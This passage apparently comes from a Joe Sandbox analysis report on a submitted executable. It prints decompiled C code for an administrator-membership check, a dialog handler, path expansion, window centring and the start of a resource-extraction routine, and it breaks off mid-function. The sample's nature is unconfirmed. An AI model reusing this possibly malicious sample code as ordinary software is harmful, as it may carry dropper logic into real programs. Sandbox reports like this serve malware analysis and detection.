                                                                                                                                                                                                          						_t28 = 1;
                                                                                                                                                                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                          							_t37 = _t39;
                                                                                                                                                                                                          							 *0x86a288(0, _v24, _v28);
                                                                                                                                                                                                          							_v20();
                                                                                                                                                                                                          							if(_t39 != _t39) {
                                                                                                                                                                                                          								asm("int 0x29");
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							FreeSid(_v24);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					FreeLibrary(_t36);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x008617f6
                                                                                                                                                                                                          0x008617fd
                                                                                                                                                                                                          0x00861805
                                                                                                                                                                                                          0x0086180b
                                                                                                                                                                                                          0x0086180d
                                                                                                                                                                                                          0x00861815
                                                                                                                                                                                                          0x00861818
                                                                                                                                                                                                          0x00861820
                                                                                                                                                                                                          0x00861824
                                                                                                                                                                                                          0x0086182c
                                                                                                                                                                                                          0x00861832
                                                                                                                                                                                                          0x00861837
                                                                                                                                                                                                          0x00861851
                                                                                                                                                                                                          0x00861854
                                                                                                                                                                                                          0x0086185d
                                                                                                                                                                                                          0x00861862
                                                                                                                                                                                                          0x0086186c
                                                                                                                                                                                                          0x00861872
                                                                                                                                                                                                          0x00861877
                                                                                                                                                                                                          0x0086187e
                                                                                                                                                                                                          0x0086187e
                                                                                                                                                                                                          0x00861883
                                                                                                                                                                                                          0x00861883
                                                                                                                                                                                                          0x0086185d
                                                                                                                                                                                                          0x0086188a
                                                                                                                                                                                                          0x0086188a
                                                                                                                                                                                                          0x008618a2

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008618DD), ref: 0086181A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0086182C
                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(008618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008618DD), ref: 00861855
                                                                                                                                                                                                          • FreeSid.ADVAPI32(?,?,?,?,008618DD), ref: 00861883
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,008618DD), ref: 0086188A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                          • API String ID: 4204503880-1888249752
                                                                                                                                                                                                          • Opcode ID: 15748a4db605529cb9f959bf39f8ba37513ce95e541b62a029b3d374f8274492
                                                                                                                                                                                                          • Instruction ID: ad664476b6cf12c2768c3d53e31b7cddf9aa864c5f70c707684bdb5a5fc7bf5b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15748a4db605529cb9f959bf39f8ba37513ce95e541b62a029b3d374f8274492
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03119371E00209EBDB149FA4DC49ABEBB78FF44700F161569FA15F7291DB709D048B92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				struct HWND__* _t12;
                                                                                                                                                                                                          				int _t22;
                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t7 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t7 == 0) {
                                                                                                                                                                                                          					EndDialog(_a4, 2);
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 = _t7 - 0x100;
                                                                                                                                                                                                          				if(_t11 == 0) {
                                                                                                                                                                                                          					_t12 = GetDesktopWindow();
                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                          					E008643D0(_t24, _t12);
                                                                                                                                                                                                          					SetWindowTextA(_t24, "herso");
                                                                                                                                                                                                          					SetDlgItemTextA(_t24, 0x838,  *0x869404);
                                                                                                                                                                                                          					SetForegroundWindow(_t24);
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t11 == 1) {
                                                                                                                                                                                                          					_t22 = _a12;
                                                                                                                                                                                                          					if(_t22 < 6) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t22 <= 7) {
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						EndDialog(_a4, _t22);
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t22 != 0x839) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x8691dc = 1;
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          0x00863459
                                                                                                                                                                                                          0x0086345c
                                                                                                                                                                                                          0x008634d8
                                                                                                                                                                                                          0x008634de
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008634e0
                                                                                                                                                                                                          0x0086345e
                                                                                                                                                                                                          0x00863463
                                                                                                                                                                                                          0x0086349a
                                                                                                                                                                                                          0x008634a0
                                                                                                                                                                                                          0x008634a7
                                                                                                                                                                                                          0x008634b2
                                                                                                                                                                                                          0x008634c4
                                                                                                                                                                                                          0x008634cb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008634cb
                                                                                                                                                                                                          0x00863468
                                                                                                                                                                                                          0x0086346e
                                                                                                                                                                                                          0x00863474
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086347c
                                                                                                                                                                                                          0x0086348c
                                                                                                                                                                                                          0x00863490
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863496
                                                                                                                                                                                                          0x00863484
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863486
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863486
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00863490
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0086349A
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 008634B2
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 008634C4
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 008634CB
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 008634D8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 852535152-3992069730
                                                                                                                                                                                                          • Opcode ID: c289bbbbc7a76ef8bc11cfb07d682bd17cab66a35bbbd7fd97fd5b85243f823f
                                                                                                                                                                                                          • Instruction ID: c2a974391c5f302a9792289eca702e25803107e305e812c5966e2addc32e2ba3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c289bbbbc7a76ef8bc11cfb07d682bd17cab66a35bbbd7fd97fd5b85243f823f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4301D431240118ABC71A5F69EC0C96DBB64FB16700F135010F947E66A0CFB59F51CB89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E00862AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				char _t32;
                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                          				char* _t38;
                                                                                                                                                                                                          				char _t42;
                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                          				intOrPtr* _t55;
                                                                                                                                                                                                          				CHAR* _t59;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				CHAR* _t64;
                                                                                                                                                                                                          				CHAR* _t65;
                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t60 = __edx;
                                                                                                                                                                                                          				_t16 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                          				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                          				_t65 = _a4;
                                                                                                                                                                                                          				_t44 = __edx;
                                                                                                                                                                                                          				_t64 = __ecx;
                                                                                                                                                                                                          				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                          					GetModuleFileNameA( *0x869a3c,  &_v268, 0x104);
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_t17 =  *_t64;
                                                                                                                                                                                                          						if(_t17 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                          						 *_t65 =  *_t64;
                                                                                                                                                                                                          						if(_t21 != 0) {
                                                                                                                                                                                                          							_t65[1] = _t64[1];
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *_t64 != 0x23) {
                                                                                                                                                                                                          							L19:
                                                                                                                                                                                                          							_t65 = CharNextA(_t65);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t64 = CharNextA(_t64);
                                                                                                                                                                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                          									if( *_t64 == 0x23) {
                                                                                                                                                                                                          										goto L19;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E00861680(_t65, E008617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                          									_t52 = _t65;
                                                                                                                                                                                                          									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                          									_t60 = _t14;
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										_t32 =  *_t52;
                                                                                                                                                                                                          										_t52 =  &(_t52[1]);
                                                                                                                                                                                                          									} while (_t32 != 0);
                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								E008665E8( &_v268);
                                                                                                                                                                                                          								_t55 =  &_v268;
                                                                                                                                                                                                          								_t62 = _t55 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t34 =  *_t55;
                                                                                                                                                                                                          									_t55 = _t55 + 1;
                                                                                                                                                                                                          								} while (_t34 != 0);
                                                                                                                                                                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                          									 *_t38 = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E00861680(_t65, E008617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                          								_t59 = _t65;
                                                                                                                                                                                                          								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                          								_t60 = _t12;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t42 =  *_t59;
                                                                                                                                                                                                          									_t59 =  &(_t59[1]);
                                                                                                                                                                                                          								} while (_t42 != 0);
                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t64 = CharNextA(_t64);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *_t65 = _t17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                          			}






















                                                                                                                                                                                                          0x00862aac
                                                                                                                                                                                                          0x00862ab7
                                                                                                                                                                                                          0x00862abc
                                                                                                                                                                                                          0x00862abe
                                                                                                                                                                                                          0x00862ac3
                                                                                                                                                                                                          0x00862ac6
                                                                                                                                                                                                          0x00862ac9
                                                                                                                                                                                                          0x00862ace
                                                                                                                                                                                                          0x00862ae6
                                                                                                                                                                                                          0x00862bdc
                                                                                                                                                                                                          0x00862bdc
                                                                                                                                                                                                          0x00862be0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862af2
                                                                                                                                                                                                          0x00862afc
                                                                                                                                                                                                          0x00862b00
                                                                                                                                                                                                          0x00862b05
                                                                                                                                                                                                          0x00862b05
                                                                                                                                                                                                          0x00862b0b
                                                                                                                                                                                                          0x00862bca
                                                                                                                                                                                                          0x00862bd1
                                                                                                                                                                                                          0x00862b11
                                                                                                                                                                                                          0x00862b18
                                                                                                                                                                                                          0x00862b26
                                                                                                                                                                                                          0x00862b99
                                                                                                                                                                                                          0x00862bc8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862b9b
                                                                                                                                                                                                          0x00862bae
                                                                                                                                                                                                          0x00862bb3
                                                                                                                                                                                                          0x00862bb5
                                                                                                                                                                                                          0x00862bb5
                                                                                                                                                                                                          0x00862bb8
                                                                                                                                                                                                          0x00862bb8
                                                                                                                                                                                                          0x00862bba
                                                                                                                                                                                                          0x00862bbb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862bb8
                                                                                                                                                                                                          0x00862b28
                                                                                                                                                                                                          0x00862b2e
                                                                                                                                                                                                          0x00862b33
                                                                                                                                                                                                          0x00862b39
                                                                                                                                                                                                          0x00862b3c
                                                                                                                                                                                                          0x00862b3c
                                                                                                                                                                                                          0x00862b3e
                                                                                                                                                                                                          0x00862b3f
                                                                                                                                                                                                          0x00862b55
                                                                                                                                                                                                          0x00862b5d
                                                                                                                                                                                                          0x00862b64
                                                                                                                                                                                                          0x00862b64
                                                                                                                                                                                                          0x00862b7a
                                                                                                                                                                                                          0x00862b7f
                                                                                                                                                                                                          0x00862b81
                                                                                                                                                                                                          0x00862b81
                                                                                                                                                                                                          0x00862b84
                                                                                                                                                                                                          0x00862b84
                                                                                                                                                                                                          0x00862b86
                                                                                                                                                                                                          0x00862b87
                                                                                                                                                                                                          0x00862bbf
                                                                                                                                                                                                          0x00862bc1
                                                                                                                                                                                                          0x00862bc1
                                                                                                                                                                                                          0x00862b26
                                                                                                                                                                                                          0x00862bda
                                                                                                                                                                                                          0x00862bda
                                                                                                                                                                                                          0x00862be6
                                                                                                                                                                                                          0x00862be6
                                                                                                                                                                                                          0x00862bf8

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00862AE6
                                                                                                                                                                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 00862AF2
                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00862B12
                                                                                                                                                                                                          • CharUpperA.USER32 ref: 00862B1E
                                                                                                                                                                                                          • CharPrevA.USER32(?,?), ref: 00862B55
                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00862BD4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 571164536-0
                                                                                                                                                                                                          • Opcode ID: 676a498b0fe214d74a92ef1af2e7057ca5e53591fa61d290f456bcece05eb595
                                                                                                                                                                                                          • Instruction ID: 1a1eb7ef079786bf318c35a1490e4f69bbd0cd80c1338792a0b550ca2fc82b1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 676a498b0fe214d74a92ef1af2e7057ca5e53591fa61d290f456bcece05eb595
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE4103346046859EDB199F349C14AFD7BA9FF52320F0A00DAE8C2D7202DF754E868B61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E008643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                          				struct HWND__* _v44;
                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                          				int _v60;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                          				struct HWND__* _t63;
                                                                                                                                                                                                          				struct HWND__* _t67;
                                                                                                                                                                                                          				struct HWND__* _t68;
                                                                                                                                                                                                          				struct HDC__* _t69;
                                                                                                                                                                                                          				int _t72;
                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t63 = __edx;
                                                                                                                                                                                                          				_t29 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                          				_t68 = __edx;
                                                                                                                                                                                                          				_v44 = __ecx;
                                                                                                                                                                                                          				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                          				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                          				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                          				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                          				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                          				_t69 = GetDC(_v44);
                                                                                                                                                                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                          				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                          				_t56 = _v48;
                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                          				_t67 = 0;
                                                                                                                                                                                                          				if(_t72 >= 0) {
                                                                                                                                                                                                          					_t63 = _v52;
                                                                                                                                                                                                          					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                          						_t72 = _t63 - _t56;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t72 = _t67;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                          				if(_t59 >= 0) {
                                                                                                                                                                                                          					_t63 = _v60;
                                                                                                                                                                                                          					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                          						_t59 = _t63 - _t53;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t59 = _t67;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                          			}
























                                                                                                                                                                                                          0x008643d0
                                                                                                                                                                                                          0x008643d8
                                                                                                                                                                                                          0x008643df
                                                                                                                                                                                                          0x008643e6
                                                                                                                                                                                                          0x008643ec
                                                                                                                                                                                                          0x008643f1
                                                                                                                                                                                                          0x00864400
                                                                                                                                                                                                          0x00864403
                                                                                                                                                                                                          0x0086440b
                                                                                                                                                                                                          0x00864420
                                                                                                                                                                                                          0x00864429
                                                                                                                                                                                                          0x00864437
                                                                                                                                                                                                          0x00864444
                                                                                                                                                                                                          0x00864447
                                                                                                                                                                                                          0x0086444d
                                                                                                                                                                                                          0x00864454
                                                                                                                                                                                                          0x0086445b
                                                                                                                                                                                                          0x00864460
                                                                                                                                                                                                          0x00864461
                                                                                                                                                                                                          0x00864467
                                                                                                                                                                                                          0x0086446f
                                                                                                                                                                                                          0x00864473
                                                                                                                                                                                                          0x00864473
                                                                                                                                                                                                          0x00864463
                                                                                                                                                                                                          0x00864463
                                                                                                                                                                                                          0x00864463
                                                                                                                                                                                                          0x0086447a
                                                                                                                                                                                                          0x00864481
                                                                                                                                                                                                          0x00864484
                                                                                                                                                                                                          0x0086448a
                                                                                                                                                                                                          0x00864492
                                                                                                                                                                                                          0x00864496
                                                                                                                                                                                                          0x00864496
                                                                                                                                                                                                          0x00864486
                                                                                                                                                                                                          0x00864486
                                                                                                                                                                                                          0x00864486
                                                                                                                                                                                                          0x008644b8

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 008643F1
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0086440B
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00864423
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0086442E
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0086443A
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00864447
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008644A2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2212493051-0
                                                                                                                                                                                                          • Opcode ID: 36afeddf5854909a0c92378d1cd7fe5dba2a21171821a12b74f2c5dffc99bbdb
                                                                                                                                                                                                          • Instruction ID: 9c9879a7e50edcbdf47b22e4f347fef47430a764281dcc115d4c1bbd6d7a8e1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36afeddf5854909a0c92378d1cd7fe5dba2a21171821a12b74f2c5dffc99bbdb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56314B32E00119AFCB14CFB8DD899EEBBB5FB89310F165169F806F3240DA70AC058B65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                          			E00866298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                          				struct HRSRC__* _t21;
                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				intOrPtr* _t40;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				struct HINSTANCE__* _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t44 = __edx;
                                                                                                                                                                                                          				_t16 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                          				_t46 = 0;
                                                                                                                                                                                                          				_v32 = __ecx;
                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                          				_t36 = 1;
                                                                                                                                                                                                          				E0086171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t51 = _t51 + 0x10;
                                                                                                                                                                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                          					if(_t21 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                          					if(_t45 == 0) {
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						_t36 = _t46;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                          						_t44 = _t5;
                                                                                                                                                                                                          						_t40 = _t44;
                                                                                                                                                                                                          						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                          						_t47 = _t6;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t26 =  *_t40;
                                                                                                                                                                                                          							_t40 = _t40 + 1;
                                                                                                                                                                                                          						} while (_t26 != 0);
                                                                                                                                                                                                          						_t41 = _t40 - _t47;
                                                                                                                                                                                                          						_t46 = _t51;
                                                                                                                                                                                                          						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                          						 *0x86a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                          						_t30 = _v32();
                                                                                                                                                                                                          						if(_t51 != _t51) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(_t45);
                                                                                                                                                                                                          						if(_t30 == 0) {
